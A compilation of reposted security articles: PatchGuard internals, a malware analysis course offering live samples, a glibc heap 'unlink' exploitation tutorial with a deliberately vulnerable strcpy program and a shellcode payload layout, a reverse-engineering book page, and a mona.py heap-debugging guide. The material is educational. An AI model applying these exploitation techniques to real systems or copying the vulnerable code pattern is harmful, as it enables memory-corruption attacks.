The first buffer area, located after the TSC (time stamp counter) seed values, contains all the initial Patchguard-related configuration data. Noteworthy are the 2 Patchguard keys (the master one, used for all key calculations, and the decryption key), the Patchguard IAT (pointers to some Nt kernel functions), all the needed kernel data structure values (for example the KiWaitAlways symbol, the KeServiceDescriptorTable data structure, and so on), the Patchguard verification work item, the 3 copied IDT entries (used to defeat the debug registers attack), and finally the various Patchguard internal relocated function offsets.

Patchguard and Nt vital routines code

This section is very important because it contains the copies of the pointers and the code of the most important Nt routines used by Patchguard to crash the system in case something wrong is found. 
In this way, even if a rootkit tries to forge or block the crash routines, the Patchguard code can completely defeat the malicious patch and correctly crash the system. Here is the list of the copied Nt functions: HaliHaltSystem, KeBugCheckEx, KeBugCheck2, KiBugCheckDebugBreak, KiDebugTrapOrFault, DbgBreakPointWithStatus, RtlCaptureContext, KeQueryCurrentStackInformation, KiSaveProcessorControlState, and the HalHaltSystem pointer.

Furthermore, the section contains the entire “INITKDBG” code section of the Nt kernel. This section implements the main Patchguard code:

- Kernel Patch Protection main check routine and first self-verification procedure
- Patchguard work item routine and system crash routine (which erases even the stack)
- Patchguard timer and one entry point (there are many others, but not in the INITKDBG section)

Protected Code and Data

All the values and data structures used to verify the entire Nt kernel code reside here. The area is huge (227 KB more or less) and it is organized in at least 3 different ways:

1. The first 2 KB contain an array of data structures that store the pointers, sizes, and relative calculated integrity keys of the code (and data) chunks of all the Nt functions used by Kernel Patch Protection to correctly do its job.

2. The Nt kernel module (“ntoskrnl.exe”) base address and its exception directory pointer, size and calculated integrity key. A big array of DWORD keys then follows: for each RUNTIME_FUNCTION entry of the module’s exception directory there is a relative 4-byte key. In this manner Patchguard can verify each code chunk of the Nt kernel.

3. A copy of all Patchguard-protected data. 
I still need to investigate the way in which the protected Patchguard data (like the global “g_CiOptions” symbol of the “CI.DLL” code integrity module, for example) is stored in memory, but we know for sure that the data is binary-copied into this section from its original location while the OS is starting.

VERIFICATION METHODS - Some Words

Describing the actual methods used to verify the integrity of the running operating system kernel is outside the scope of this article; we are only going to give an introduction. Kernel Patch Protection has some entry points scattered inside the kernel: 12 DPC routines, 2 timers, some APC routines, and others. When the Patchguard code acquires processor execution, it decrypts its buffer and then calls the self-verify routine. The latter function first verifies 0x3C0 bytes of the Patchguard buffer (including the just-executed decryption code), re-calculating a checksum value and comparing it with the stored one. Then it performs the same verification for the Nt functions exploited by its main check routine. The integrity keys and verification data structures are stored at the start of area 3 of the PG buffer.

If one of the checks goes wrong, the Patchguard self-verify routine immediately crashes the system. It does this in a very clever manner: first it restores all the virtual memory structure values of the vital Nt kernel functions (like the page table entry, page directory entry and so on). Then it replaces all the code with the copy located in the Patchguard buffer. In this way any eventual rootkit modification is erased, and as a result the Patchguard code can crash the system without any obstacles. Finally it calls the “SdbpCheckDll” routine (a misleading name) to erase the current thread stack and transfer execution to the KeBugCheckEx crash routine. 
Otherwise, in the case that all the initial checks pass, the code queues a kernel work item, exploiting the standard ExQueueWorkItem kernel API (keep in mind that this function has already been checked by the previous self-verify routine). The Patchguard work item code immediately calls the main verification routine. It then copies its own buffer to another place, re-encrypts the old Patchguard buffer, and finally jumps to the ExFreePool kernel function. The latter procedure will delete the old Patchguard buffer. This way, every time a system check is raised, the Patchguard buffer location changes. The main check routine uses some other methods to verify each Nt kernel code and data chunk. Describing all of them, and the functionality of the main check routine, is deferred to the next blog post.

The code used by the Patchguard initialization routine to calculate the virtual memory data structure values is curious. Here is an example used to find the page table entry of a 64-bit memory address:

    CalculatePteVa:
        shr rcx, 9            ; Original Ptr address >> 9
        mov rax, 98000000000h ; This value negated is FFFFF680`00000000, or more
                              ; precisely "16 bits set to 1, the x64 auto-value,
                              ; all zeros"
        mov r15, 07FFFFFFFF8h
        and rcx, r15          ; RCX & 7F'FFFFFFF8h (clear the 25 MSBs and the last 3 LSBs)
        sub rcx, rax          ; RCX += FFFFF680`00000000
        mov rax, rcx          ; RAX = VA of PTE of target function

For the explanation of how it really works, and what the x64 0x1ED auto-value is, I refer the reader to the following great book about x64 memory management: Enrico Martignetti - What Makes It Page? The Windows 7 (x64) Virtual Memory Manager (2012).

Conclusions

In this blog post we have analysed the Uroburos code that disables the old Windows 7 Kernel Patch Protection, and have given an overview of the new Patchguard version 8 implementation. The reader should now be able to understand why attacks such as the one used by Uroburos cannot work with the new version of Kernel Patch Protection. 
It seems that the new implementation of this technology can defeat all known attacks. Microsoft engineers have done a great amount of work to try to mitigate this class of attacks. However, because Kernel Patch Protection is not hardware-assisted, and because its code runs at the kernel-mode privilege level (the same as all kernel drivers), it is not perfect. At an upcoming conference, I will demonstrate that a clever researcher can still disarm this new version, even if it’s a task that is more difficult to accomplish. The researcher can furthermore use the original Microsoft Patchguard code even to protect his own hooks. Stay tuned!

Sursa: VRT: The Windows 8.1 Kernel Patch Protection
  10.

Creator: Veronica Kovah
License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/)
Class Prerequisites: None
Lab Requirements: Linux system with VirtualBox and a Windows XP VM.
Class Textbooks: “Practical Malware Analysis” by Michael Sikorski and Andrew Honig
Recommended Class Duration: 2-3 days
Creator Available to Teach In-Person Classes: Yes

Author Comments: This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: persisting, communicating, and hiding.

We will achieve the items above by first learning the individual techniques sandboxes utilize. We will show how to capture and record registry, file, network, mutex, API, installation, hooking and other activity undertaken by the malware. We will create fake network responses to deceive malware so that it shows more behavior. We will also talk about how using MITRE's Malware Attribute Enumeration & Characterization (MAEC - pronounced "Mike") standard can help normalize the data obtained manually or from sandboxes, and improve junior malware analysts' reports. The class will additionally discuss how to take malware attributes and turn them into useful detection signatures such as Snort network IDS rules, or YARA signatures.

Dynamic analysis should always be an analyst's first approach to discovering malware functionality. But this class will show the instances where dynamic analysis cannot achieve complete analysis, due to malware tricks for instance. So in this class you will learn when you will need to use static analysis, as offered in the follow-on Introduction to Reverse Engineering and Reverse Engineering Malware classes. During the course students will complete many hands-on exercises. 
Course Objectives:

* Understand how to set up a protected dynamic malware analysis environment
* Get hands-on experience with various malware behavior monitoring tools
* Learn the set of malware artifacts an analyst should gather from an analysis
* Learn how to trick malware into exhibiting behaviors that only occur under special conditions
* Create actionable detection signatures from malware indicators

This class is recommended before a later class on malware static analysis, so that students understand both techniques and can utilize the technique which gives the quickest answer to a given question. Every attempt was made to properly cite references, but if any are missing, please contact the author.

Class Materials

All Materials (.zip of odp (222 slides) & class malware examples)
All Materials (.zip of pdf (222 slides) & class malware examples)
Slides Part 1 (Background concepts, terms, tools & lab setup, 68 slides)
Slides Part 2 (RAT analysis (Poison Ivy), persistence & maneuvering (how the malware strategically positions itself on the system), 67 slides)
Slides Part 3 (Malware functionality (e.g. keylogging, phone home, security degradation, self-destruction, etc.), 43 slides)
Slides Part 4 (Using an all-in-one sandbox (Cuckoo), MAEC, converting output to actionable indicators of malware presence (e.g. Snort/Yara signatures), 44 slides)
Malware samples used in class. 
Password is “infected”.

HD Videos on Youtube. Full-quality downloadable QuickTime, h.264, and Ogg videos at Archive.org:

Day 1 Part 1: Introduction (8:10)
Day 1 Part 2: Background: VirtualBox (5:56)
Day 1 Part 3: Background: PE files & Packers (17:00)
Day 1 Part 4: Background: File Identification (15:44)
Day 1 Part 5: Background: Windows Libraries (4:27)
Day 1 Part 6: Background: Windows Processes (35:16)
Day 1 Part 7: Background: Windows Registry (18:07)
Day 1 Part 8: Background: Windows Services (25:52)
Day 1 Part 9: Background: Networking Refresher (27:38)
Day 1 Part 10: Isolated Malware Lab Setup (26:47)
Day 1 Part 11: Malware Terminology (6:50)
Day 1 Part 12: Playing with Malware: Poison Ivy RAT (30:54)
Day 1 Part 13: Behavioral Analysis Overview (5:30)
Day 1 Part 14: Persistence (34:54)

Day 2 will be posted Aug 24th. Day 3 was lost due to a video server malfunction. The class will be re-delivered at MITRE in September, and day 3 will be re-recorded then.

Sursa: MalwareDynamicAnalysis
11. x86 Exploitation 101: heap overflows… unlink me, would you please?

Well, do the previous techniques apply to the dynamic allocation scenario? What if, instead of a statically allocated array, there's a malloc-ed space? Would that work? Well, more or less, but things get REALLY more complicated. And I mean it for real. So, instead of stack overflows, there will be heap overflows: the problem is that the heap and the stack work in different ways. In addition, the heap is handled differently according to the allocator implementation: this makes heap overflow exploits really dependent on the allocator implementation and on the operating system. As for now I'm focusing on Linux, so I decided to analyze the exploitation scenario and the history of the most common Linux allocator, i.e. the one included in the GNU C library (glibc).

Why should I care about the history? Glibc developers patched, time after time, most of the bugs in the malloc implementation that allowed exploits to work. This, anyway, is a good training exercise to really get into this stuff and understand the general thought process. Also, as the exploitation of a heap overflow strongly relies on the implementation of the allocator, a deep analysis of how it's implemented is mandatory.

So, first things first. How is malloc implemented in glibc? The implementation is a variation of the ptmalloc2 implementation, which is a variation of dlmalloc. Anyway, as the glibc code says, “There have been substantial changes made after the integration into glibc in all parts of the code. Do not look for much commonality with the ptmalloc2 version”. Even if it's a variation of a variation, the fundamental ideas are still the same. Actually, ptmalloc2 supports more than one heap at the same time, and each heap is identified by the following structure:

[INDENT]
typedef struct _heap_info
{
  mstate ar_ptr;           /* Arena for this heap. */
  struct _heap_info *prev; /* Previous heap. */
  size_t size;             /* Current size in bytes. */
  size_t mprotect_size;    /* Size in bytes that has been mprotected
                              PROT_READ|PROT_WRITE. */
  /* Make sure the following data is properly aligned, particularly
     that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
     MALLOC_ALIGNMENT. */
  char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
[/INDENT]

The most important thing in this structure is the ar_ptr variable, as it's a pointer to the arena, i.e. the heap itself. Also, there's the size variable storing the size of the heap. Having more than one heap in a multi-threading context is really useful: if a thread is reading the content of a variable in a given arena and another thread asks to allocate new memory, it is possible to create a new arena and use the newly created one to perform all the required operations. Each arena is described by the following structure:

[INDENT]
struct malloc_state
{
  /* Serialize access. */
  mutex_t mutex;

  /* Flags (formerly in max_fast). */
  int flags;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas. */
  struct malloc_state *next_free;

  /* Memory allocated from the system in this arena. */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};
[/INDENT]

In this structure, there's the mutex for this arena, used during concurrent accesses, and two other really important fields: top and bins. The top field is a chunk of memory (the chunk being the fundamental element of the allocator): a chunk is where the data for which space has been allocated is going to be stored. Each chunk in this arena is a memory fragment that can be allocated. 
At the beginning, there's only one big chunk in the arena (called the wilderness), which is pointed to by the top field itself: this chunk is always free and its size represents the free space of the arena. It also marks the end of the available space of the arena. The bins array is composed of double-linked lists of chunks that were allocated and then freed (this means that, at the beginning, all the bins are empty). Each bin stores a list of chunks of a given size in order to allow the allocator to easily search for a free chunk of the required size: the search starts by looking for the smallest, best-fitting one. A chunk is described by the following structure:

[INDENT]
struct malloc_chunk
{
  INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
  INTERNAL_SIZE_T size;      /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;   /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size. */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};
[/INDENT]

The different fields of this structure are used in different ways, depending on the status of the chunk itself. If the chunk is allocated, only the first two fields are present. The prev_size field specifies the size of the previous chunk if the previous one is free (if it is allocated, this field is “shared” with the previous chunk, enlarging it by 4 bytes in order to decrease the waste of space), while the size field specifies the size of the current chunk. If the chunk is in the free state, there are in addition two pointers: fd and bk. These are the pointers used to double-link the list of chunks. The other two pointers (also present only in free chunks) are not that important in this context and won't be examined. How come there's no flag to tell if the current chunk is free or allocated? 
Well, a feature of the chunks in this implementation is that they are 8-byte aligned: this means that the last three bits of the size field can be used as general purpose flags. The LSB of the size field tells us if the previous chunk is allocated or not (PREV_INUSE) The next bit tells if the chunk was allocated by using the mmap system call (IS_MMAPPED) The third bit specifies if the chunk is stored in the main arena or not (NON_MAIN_ARENA) In order to know if a given chunk is free or not, it is necessary to get the next chunk by adding size to the pointer of the current chunk (obtaining the address of the next chunk), and then check the PREV_INUSE bit of the size field of that next chunk. When the malloc function is called, the first thing done is to search the bins for a previously-freed chunk matching the requested size; otherwise, a new chunk is created in the wilderness, next to the last allocated one. If a chunk is found in the bins, it has to be removed from its list, in order to keep the whole structure coherent. This is done by using the infamous unlink macro defined in malloc.c: this macro uses the bk and the fd fields of the chunk being removed to perform its task. Before glibc 2.3.4 (released at the end of 2004), the unlink macro was defined as follows: [INDENT]
/* Take a chunk off a bin list */
#define unlink(P, BK, FD) { \
    FD = P->fd;  \
    BK = P->bk;  \
    FD->bk = BK; \
    BK->fd = FD; \
}
[/INDENT] This macro is just the extraction of an item from a doubly-linked list: business as usual. If no space is available on the heap, new memory for the heap is requested from the operating system, using the sbrk or the mmap system call (if mmap is used, the chunk is marked with the IS_MMAPPED bit). The heap address where the chunk has been allocated is then returned by malloc. However, there's another situation in which the unlink macro may be used: during a free. 
In fact, if the chunks adjacent (both before and after) to the one being freed are not in use, they are all merged together into one chunk. This means that all the chunks that were in a free state before the merging need to be unlinked from the bins where they were stored, by using the aforementioned macro. The resulting chunk is finally moved to the unsorted_chunks list. In July 2000 Solar Designer on Openwall, and then in November 2001 MaXX on Phrack #57, published two articles on how to exploit this macro. Their whole point is: what if it was possible to modify the fd and the bk pointers? In fact, if we look at the malloc_chunk structure, the whole unlink macro can be reduced to the following instructions: [INDENT]
FD = *(P + 8);
BK = *(P + 12);
*(FD + 12) = BK;
*(BK + 8) = FD;
[/INDENT] This means that, if we could control the fd and the bk pointers, it would be possible to overwrite the FD+12 location with the BK content. If BK points to the shellcode address, that would be awesome. Actually, the BK+8 location gets overwritten as well, and that would be in the middle of the shellcode itself: this means that the first instruction of the shellcode should jump over this overwritten part. We are given the chance to overwrite any DWORD of memory: the problem is, which one would be of any use to overwrite? Overwriting the return address, just like in stack overflows, is painful, as it depends on the stack situation at the moment. Interesting alternatives would be overwriting something in libc, an exception handler address, or the free function address itself. This means that every single function pointer can actually be overwritten. MaXX, in his article on Phrack, proposed the idea of overwriting the first function pointer emplacement in the .dtors section (he actually re-proposed ideas already exposed in an earlier article). gcc provides an interesting feature: constructors and destructors. 
The idea behind this is exactly the same used in C++ for classes. It is possible to mark some functions with attributes so that they are automatically executed before the main function (constructors) or after it (destructors). The declarations are specified in the following way: [INDENT]
static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));
[/INDENT] where start and stop are arbitrary names for the functions. The addresses of these functions are stored, respectively, in the .ctors and .dtors sections in the following way: there are 4 bytes set to 0xFF at the beginning and 4 bytes set to 0x00 at the end and, in between, there are the addresses of the functions. Of course, if there are no constructors/destructors defined, the .ctors/.dtors section simply looks like 0xFFFFFFFF 0x00000000. The goal is to overwrite the 0x00000000 part with the address of the function that has to be executed as a destructor (the head MUST be left as 0xFFFFFFFF). So, the "only" thing left to do is to be able to control the fd and the bk pointers. How can this be done? To do this, two adjacent allocated chunks are required and an overflow must be possible on the first one. In fact, let's say that we have the following piece of code: [INDENT]
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    char *first_buf;
    char *second_buf;

    first_buf = (char *)malloc(78 * sizeof(char));
    second_buf = (char *)malloc(20 * sizeof(char));
    strcpy(first_buf, argv[1]);
    free(first_buf);
    free(second_buf);
    return 0;
}
[/INDENT] The heap situation will look like this: first_buf's size has been aligned to 8 bytes (so, from 78 to 80 bytes of buffer space) and includes the prev_size and the size fields (80+4+4=88). In addition the LSB has been set to 1, as the chunk is used: the final size for this chunk is 89 (0x59). 
The second_buf chunk size is already 8-byte aligned and shares its first 4 bytes with the previous chunk: this means that the final size of the chunk itself is 25 (0x19), as the LSB is set as well. It is clear that, if we overflow first_buf, it is possible to overwrite the data of second_buf (metadata included). So here's the strategy: The second_buf chunk must be "transformed" into a freed chunk The address of memory where the 4 bytes are going to be written (minus 12) must be stored in the fd field of the chunk storing second_buf The 4 bytes to be written must be stored in the bk field of the chunk storing second_buf The whole thing must be triggered when free(first_buf) is executed The strategy is pretty simple: the only tricky point is the first one, but its solution is simple and awesome. Glibc's implementation of malloc checks if a chunk is free or not with the following macro: [INDENT]
#define inuse_bit_at_offset(p, s) \
    (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE)
[/INDENT] where p is the address of the chunk and s is its size (it actually checks the PREV_INUSE bit of the size field of the following chunk). Would this mean modifying a third chunk? Well, no… What if the size of the second chunk is set to 0? Then the size field of the second chunk itself is read! As the size is set to 0, the PREV_INUSE bit is clear: according to glibc, second_buf is a free chunk. That's everything we need, actually. The payload to be written in first_buf will be: 80 bytes of filler data (the 78 requested bytes, rounded up to the 8-byte aligned buffer size) 4 bytes of useless data overwriting the prev_size field of second_buf's chunk 4 bytes set to 0 overwriting the size field of second_buf's chunk 4 bytes set to the address of the last four bytes of .dtors (the location holding 0x00000000) minus 12, overwriting the fd field of second_buf's chunk 4 bytes set to the address of the shellcode to be executed, overwriting the bk field of second_buf's chunk This is really everything needed to carry out a heap overflow exploiting the unlink macro bug. 
An alternative way of exploitation exists: the double-free scenario. What happens if the same chunk is freed twice? A few glibc versions ago, it would have been inserted twice in the free chunks list. Let's say that one of these two entries is then reallocated and that we modify the locations where the fd and bk fields are. Then let's say that we manage to get the "second" chunk, still sitting in the free list, allocated as well: as the unlink macro is called at allocation time too, the whole mechanism is triggered again in a similar way. This trick is known as the double-free exploitation and, even if it's not THAT documented, there are known exploits aiming at this kind of vulnerability. Sadly, all this won't work nowadays, for four reasons: The RELRO technique (enabled by default on recent Linux distributions) marks the relocation sections used for dynamically loaded functions read-only (.ctors, .dtors, .jcr, .dynamic and .got): this means that the program crashes if it tries to modify one of these sections. The __do_global_dtors_aux function (which is the one executing the destructors) was hardened in 2007 in such a way that only the destructors actually defined in the code are going to be executed. As said at the beginning, the unlink macro has been hardened in order to check the pointers before unlinking: [INDENT]
#define unlink(P, BK, FD) { \
    FD = P->fd; \
    BK = P->bk; \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
        malloc_printerr (check_action, "corrupted double-linked list", P); \
    else { \
        FD->bk = BK; \
        BK->fd = FD; \
    } \
}
[/INDENT] In a normal situation P->fd->bk points to P (the same is true for P->bk->fd): if this isn't the case, it means that the pointers have been modified and that the doubly-linked list is corrupted. 
Checks for double frees have been added more or less everywhere. The next step in this field is the publication of another article, on Phrack #61 by jp in August 2003 (still some time before the unlink macro was patched in glibc), that aims at building a higher layer on top of what MaXX had discovered two years before. jp's main point is: what should I do, knowing that I can write four bytes of memory with almost arbitrary data using the unlink technique? At the beginning of the paper he defined the new acronym aa4bmo, meaning "Almost Arbitrary 4 Bytes Mirrored Overwrite", and for respect's sake I will keep using this acronym from now on. When MaXX wrote his article there was no NON_MAIN_ARENA bit, so what jp did was an update of the techniques exposed by MaXX in order to have them working on the 2003 version of glibc, plus the implementation of the aa4bmoPrimitive function, which allows one to write more or less complex programs exploiting the aforementioned vulnerability. Based on the aa4bmo primitive, Phantasmal Phantasmagoria wrote another interesting article called "Exploiting the Wilderness": in it he proved that, in case an overflowable buffer is located next to the wilderness, it is still possible to achieve the aa4bmo. Of course, jp's whole work (and everything else based on it) stopped working when the unlink macro was hardened. The work of MaXX, jp and Phantasmal Phantasmagoria was an important step in the history of heap overflow exploitation, as it opened minds to new roads, and it didn't take too long to realize that there were/are other ways to exploit heap overflows. In fact, in 2005 Phantasmal Phantasmagoria came out with a theoretical article called Malloc Maleficarum and started a new rush towards heap overflow exploits. All these next steps will be explained in the next article. Sursa: x86 Exploitation 101: heap overflows… unlink me, would you please? | gb_master's /dev/null
12. [h=2]"Reverse Engineering for Beginners" free book[/h] Written by Dennis Yurichev (yurichev.com). [h=3]Praise for the book[/h]
'It's very well done .. and for free .. amazing.' (Daniel Bilar, Siege Technologies, LLC.)
'...excellent and free' (Pete Finnigan, Oracle RDBMS security guru.)
'... book is interesting, great job!' (Michael Sikorski, author of Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software.)
'... my compliments for the very nice tutorial!' (Herbert Bos, full professor at the Vrije Universiteit Amsterdam.)
'... It is amazing and unbelievable.' (Luis Rocha, CISSP / ISSAP, Technical Manager, Network & Information Security at Verizon Business.)
'Thanks for the great work and your book.' (Joris van de Vis, SAP Netweaver & Security specialist.)
'... reasonable intro to some of the techniques.' (Mike Stay, teacher at the Federal Law Enforcement Training Center, Georgia, US.)
[h=3]As seen on...[/h] ... hacker news: #1, #2, reddit: #1, #2, #3, #4, #5, #6, habrahabr. [h=3]Contents[/h] Topics discussed: x86, ARM. Topics touched: Oracle RDBMS, Itanium, copy-protection dongles, LD_PRELOAD, stack overflow, ELF, win32 PE file format, x86-64, critical sections, syscalls, TLS, position-independent code (PIC), profile-guided optimization, C++ STL, OpenMP, win32 SEH. [h=3]Download PDF files[/h] [TABLE]
[TR]
[TD=class: dl1]Download English version[/TD]
[TD=class: dl2]A4 (for browsing or printing)[/TD]
[TD=class: dl2]A5 (for ebook readers)[/TD]
[/TR]
[TR]
[TD=class: dl1]Download Russian version[/TD]
[TD=class: dl2]A4 (for browsing or printing)[/TD]
[TD=class: dl2]A5 (for ebook readers)[/TD]
[/TR]
[/TABLE] [h=3]Supplementary materials[/h]Exercises, exercise solutions[h=3]Be social![/h]Feel free to send me corrections; it's even possible to submit patches to the book's source code (LaTeX) on GitHub or gitorious or Google Code or BitBucket, or SourceForge! There is also a supporting forum, where you may ask any questions! 
Or write me an email: dennis(a)yurichev.com [h=3]News[/h]See ChangeLog [h=3]Stay tuned![/h]My current plans for this book: MIPS, Objective-C, Visual Basic, anti-debugging tricks, Windows NT kernel debugger, Java, .NET, Oracle RDBMS. Subscribe to my twitter. Here is also my blog. Web 2.0 hater? Subscribe to my mailing list for receiving updates of this book by email. [h=3]Please donate![/h][TABLE]
[TR]
[TD=class: dl2]Ways to donate[/TD]
[/TR]
[/TABLE] This book is free, freely available, also in source code form (LaTeX), and it will be so forever; I have no plans for publishing it commercially. So if you want me to continue, you may consider donating. Several ways to donate are available on this page: donate. Every donor's name will be included in the book! Donors also have the right to rearrange items in my writing plan. Sursa: "Reverse Engineering for Beginners" free book
13. Analyzing heap objects with mona.py
Published August 16, 2014 | By Corelan Team (corelanc0d3r)
Introduction
Hi all, While preparing for my Advanced exploit dev course at Derbycon, I've been playing with heap allocation primitives in IE. One of the things that causes some frustration (or, at least, tends to slow me down during the research) is the difficulty of quickly identifying objects that may be useful. After all, I'm trying to find objects that contain arbitrary data, or pointers to arbitrary data, and it's not always easy to do so because of the noise. I decided to add a few new features to mona.py that should allow you to find interesting objects in a faster way. The new features are only available under WinDBG. To get the latest version of mona, simply run !py mona up. Since I also upgraded to the latest version of pykd, you may have to update pykd.pyd as well before you can run the latest version of mona. (You should see update instructions in the WinDBG log window when you try to run mona with an outdated version of pykd)
dumpobj (do)
The first new feature is "dumpobj". This mona.py command will dump the contents of an object and provide (hopefully) useful information about the contents. The command takes the following arguments:
Usage of command 'dumpobj' :
-----------------------------
Dump the contents of an object.
Arguments:
-a <address> : Address of object
-s <number> : Size of object (default value: 0x28 [COLOR=#5576D1]or[/COLOR] size of chunk)
Optional arguments:
-l <number> : Recursively dump objects
-m <number> : Size [COLOR=#5576D1]for[/COLOR] recursive objects (default value: 0x28)
As you can see in the output of !py mona help dumpobj above, we need to provide at least 2 arguments:
-a <address> : the start location (address of the object, but you can specify any location you want)
-s <number> : the size of the object.
If you don't specify the -s argument, mona will attempt to determine the size of the object. 
If that is not possible, mona will dump 0x28 bytes of the object. Additionally, you can tell mona to dump linked objects as well. Argument -l takes a number, which refers to the number of levels for the recursive dump. In order to somewhat limit the size of the output (and for performance reasons), only the first 0x28 bytes of the linked objects will be printed (unless you use argument -m to overrule this behavior). Of course, it is quite trivial to dump the contents of an object in WinDBG. The dds or dc commands will print out objects and show some information about their contents. In some cases, the output of dds/dc is not sufficient and it would require some additional work to further analyze the object and optional objects that are linked inside this object. Let's look at an example. Let's say we have a 0x78-byte object at 0x023a1bc0. Of course, we can dump the contents of the object using native WinDBG commands:
0:001> dds 0x023a1bc0 L 0x78/4
023a1bc0 023a1d30
023a1bc4 023a1818
023a1bc8 00000000
023a1bcc 023a1d3c
023a1bd0 023a1824
023a1bd4 baadf00d
023a1bd8 00020000
023a1bdc 00000001
023a1be0 00160014
023a1be4 023a1a38
023a1be8 013a0138
023a1bec 023a1a68
023a1bf0 00000000
023a1bf4 00000001
023a1bf8 023a18a8
023a1bfc 00000000
023a1c00 00000000
023a1c04 00000007
023a1c08 00000007
023a1c0c 023a18d0
023a1c10 00000000
023a1c14 00000000
023a1c18 00000000
023a1c1c 00000000
023a1c20 00000000
023a1c24 00000000
023a1c28 00000000
023a1c2c 00000000
023a1c30 00000000
023a1c34 00000000
0:001> dc 0x023a1bc0 L 0x78/4
023a1bc0 023a1d30 023a1818 00000000 023a1d3c 0.:...:.....<.:.
023a1bd0 023a1824 baadf00d 00020000 00000001 $.:.............
023a1be0 00160014 023a1a38 013a0138 023a1a68 ....8.:.8.:.h.:.
023a1bf0 00000000 00000001 023a18a8 00000000 ..........:.....
023a1c00 00000000 00000007 00000007 023a18d0 ..............:.
023a1c10 00000000 00000000 00000000 00000000 ................
023a1c20 00000000 00000000 00000000 00000000 ................
023a1c30 00000000 00000000 ........ 
Nice. We can see all kinds of things – values that appear to be pointers, nulls, and some other "garbage". Hard to tell what it is without looking at each value individually. With mona, we can dump the same object, and mona will attempt to gather more information about each dword in the object: 0:001> !py mona [COLOR=#5576D1]do[/COLOR] -a 0x023a1bc0 Hold on... [+] No size specified, checking [COLOR=#5576D1]if[/COLOR] address is part of known heap chunk Address found [COLOR=#5576D1]in[/COLOR] chunk 0x023a1bb8, heap 0x00240000, (user)size 0x78 ---------------------------------------------------- [+] Dumping object at 0x023a1bc0, 0x78 bytes [+] Preparing output file 'dumpobj.txt' - (Re)setting logfile c:\logs\HeapAlloc2\dumpobj.txt [+] Generating [COLOR=#5576D1]module[/COLOR] info table, hang on... - Processing modules - Done. Let's rock 'n roll. >> [URL="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Object.html"]Object[/URL] at 0x023a1bc0 (0x78 bytes): Offset Address Contents Info ------ ------- -------- ----- +00 0x023a1bc0 | 0x023a1d30 (Heap) ptr to ASCII '0::' +04 0x023a1bc4 | 0x023a1818 (Heap) ptr to ASCII ':' +08 0x023a1bc8 | 0x00000000 +0c 0x023a1bcc | 0x023a1d3c (Heap) ptr to 0x77e46464 : ADVAPI32!g_CodeLevelObjTable+0x4 +10 0x023a1bd0 | 0x023a1824 (Heap) ptr to ASCII ':' +14 0x023a1bd4 | 0xbaadf00d +18 0x023a1bd8 | 0x00020000 = UNICODE ' ' +1c 0x023a1bdc | 0x00000001 +20 0x023a1be0 | 0x00160014 = UNICODE '' +24 0x023a1be4 | 0x023a1a38 (Heap) ptr to UNICODE 'Basic User' +28 0x023a1be8 | 0x013a0138 (Heap) ptr to ASCII 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...' +2c 0x023a1bec | 0x023a1a68 (Heap) ptr to UNICODE 'Allows programs to execute as a user that does [COLOR=#5576D1]not[/COLOR] have Administrator [COLOR=#5576D1]or[/COLOR] Power User access rights, but can still access resouces accessible by normal users.' 
+30 0x023a1bf0 | 0x00000000 +34 0x023a1bf4 | 0x00000001 +38 0x023a1bf8 | 0x023a18a8 +3c 0x023a1bfc | 0x00000000 +40 0x023a1c00 | 0x00000000 +44 0x023a1c04 | 0x00000007 +48 0x023a1c08 | 0x00000007 +4c 0x023a1c0c | 0x023a18d0 (Heap) ptr to ASCII ' :H:[COLOR=#00008b]p[/COLOR]:' +50 0x023a1c10 | 0x00000000 +54 0x023a1c14 | 0x00000000 +58 0x023a1c18 | 0x00000000 +5c 0x023a1c1c | 0x00000000 +60 0x023a1c20 | 0x00000000 +64 0x023a1c24 | 0x00000000 +68 0x023a1c28 | 0x00000000 +6c 0x023a1c2c | 0x00000000 +70 0x023a1c30 | 0x00000000 +74 0x023a1c34 | 0x00000000 [+] This mona.py action took 0:00:00.579000 Apparently some of the values in the object point at strings (ASCII and Unicode), another point appears to link to another object (ADVAPI32!g_CodeLevelObjTable+0×4). This is a lot more useful than dds or dc. But we can make it even better. We can tell mona to automatically print out linked objects as well, up to any level deep. Let’s repeat the mona command, this time asking for linked objects up to one level deep: 0:001> !py mona [COLOR=#5576D1]do[/COLOR] -a 0x023a1bc0 -l 1 Hold on... [+] No size specified, checking [COLOR=#5576D1]if[/COLOR] address is part of known heap chunk Address found [COLOR=#5576D1]in[/COLOR] chunk 0x023a1bb8, heap 0x00240000, (user)size 0x78 ---------------------------------------------------- [+] Dumping object at 0x023a1bc0, 0x78 bytes [+] Also dumping up to 1 levels deep, max size of nested objects: 0x28 bytes [+] Preparing output file 'dumpobj.txt' - (Re)setting logfile c:\logs\HeapAlloc2\dumpobj.txt [+] Generating 